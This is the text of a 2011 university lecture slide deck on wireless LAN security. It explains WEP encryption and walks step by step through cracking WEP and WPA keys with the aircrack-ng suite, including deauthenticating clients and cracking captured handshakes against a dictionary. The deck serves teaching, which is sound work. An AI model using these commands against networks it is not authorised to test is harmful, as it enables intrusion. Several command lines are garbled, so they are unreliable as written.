1. WLAN Security: Cracking WEP/WPA
Wireless LANs 2011
WLAN Security: Cracking WEP/WPA
รศ. ดร. อนันต์ ผลเพิ่ม
Assoc. Prof. Anan Phonphoem, Ph.D.
Computer Engineering Department
Kasetsart University, Bangkok, Thailand

2. WEP Block Diagram Encryption Block Sender Site Decryption Block
Integrity
Algorithm
(CRC-32)
Pseudo-Random
Number Generator
RC-4 +
Bitwise
XOR
Plain Text
Cipher Text
Integrity Check
Value (ICV)
Key Sequence
Secret Key (40-bit or 128-bit)
Initialization
Vector (IV) IV
Encryption Block
Sender Site
Integrity
Algorithm
Pseudo-Random
Number Generator
Bitwise
XOR
Cipher Text
Plain Text
Integrity Check
Value (ICV)
Key
Sequence IV
Secret Key (40-bit or 128-bit)
Decryption Block
Receiver Site
WEP Frame

3. WEP – Encoding Secret Key (40-bit or 128-bit) IV Initialization
Integrity
Algorithm
(CRC-32)
Pseudo-Random
Number Generator
RC-4 +
Bitwise
XOR
Plain Text
Cipher Text
Integrity Check
Value (ICV)
Key Sequence
Secret Key (40-bit or 128-bit)
Initialization
Vector (IV) IV

4. WEP Frame Clear Text Encrypted Frame Header IV Header Frame Body ICV
Trailer
FCS
4 bytes

5. WEP – Decryption Plain Text Secret Key (40-bit or 128-bit)IV
Pseudo-Random
Number Generator
Key
Sequence
Plain Text
Bitwise
XOR
Cipher Text
Integrity Check
Value (ICV)
Integrity
Algorithm

6. Cracking WEP

7. Cracking Steps Reconnaissance (Collect target info.) [kismet]
Run promiscuous mode [iwconfig, airmon]
Collect data [airodump]
Crack key [aircrack]

8. Default SSIDs

9. 1) Reconnaissance (Collect target info.)

10. Kismet (Reconnaissance)

11. Kismet (AP Info.)

12. Kismet (Client Info.)

13. 2) Run promiscuous mode

14. Regular Behavior 1 2 3 4
Station 1 transmits to all (broadcast)

15. Intention to Eavesdrop1 2 3 4
Promiscuous
mode
Station 1 transmits to station 4

16. iwconfig

17. iwlist

18. Promiscuous Mode Setup
By using iwconfig

19. Promiscuous Mode Setup
By using airmon-ng

20. Promiscuous Mode Setup

21. 3) Collect data

22. airodump
From Kismet

23. Airodump problem Solve by: root@APMoose:~/toulouse# rfkill unblock all
airodump-ng mon0
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill
/dev/rfkill is “Linux ‘s Subsystem kernel for controlling radio transmisster (activated/deactivated)”
rfkill list
0: phy0: Wireless LAN
Soft blocked: no  software can reactivate
Hard blocked: no  software cannot reactivate
1: acer-wireless: Wireless LAN
Soft blocked: no
Hard blocked: no
2: acer-bluetooth: Bluetooth
4: hci0: Bluetooth
Solve by:
rfkill unblock all

24. airodump

25. airodump data files

26. 4) Crack Key

27. aircrack
For non-encryption

28. aircrack

29. WEP Cracking Demo

30. Cracking WPA

31. Cracking Steps
Start the wireless interface in monitor mode on the specific AP channel
Start airodump-ng on AP channel with filter for bssid to collect authentication handshake
Use aireplay-ng to deauthenticate the wireless client
Run aircrack-ng to crack the pre-shared key using the authentication handshake

32. 1) Start Monitoring Mode

33. Check interface

34. iwconfig

35. Start monitoring mode

36. 2) Start airodump-ng collect authentication handshake

37. Start airodump-ng
Moose# airodump-ng -c 6 --bssid 00:1E:F7:xx:xx:xx -w psk mon0
Parameter
Description
-c 6
Wireless channel
--bssid 00:1E:F7:xx:xx:xx
AP’s MAC
-w psk
File name prefix (contain Ivs)
mon0
Interface name

38. Start airodump-ng less parameter
Moose# airodump-ng -w psk mon0

39. 3) Deauthenticate client

40. aireplay
Moose# aireplay-ng a 00:12:01:xx:xx:xx -c 00:23:11:xx:xx:xx mon0
Parameter
Description -0
deauthentication 1
# deauthentication sent
-a 00:12:01:xx:xx:xx
AP’s MAC
-c 00:23:11:xx:xx:xx
Deauthing client’s MAC-
mon0
Interface name

41. 4) Crack

42. Need a dictionary
Moose# aircrack-ng –b 00:12:01:xx:xx:xx -psk*.cap

43. With dictionary
Moose# aircrack-ng -w password.lst -psk*.cap

44. Handshake found

45. Successfully Crack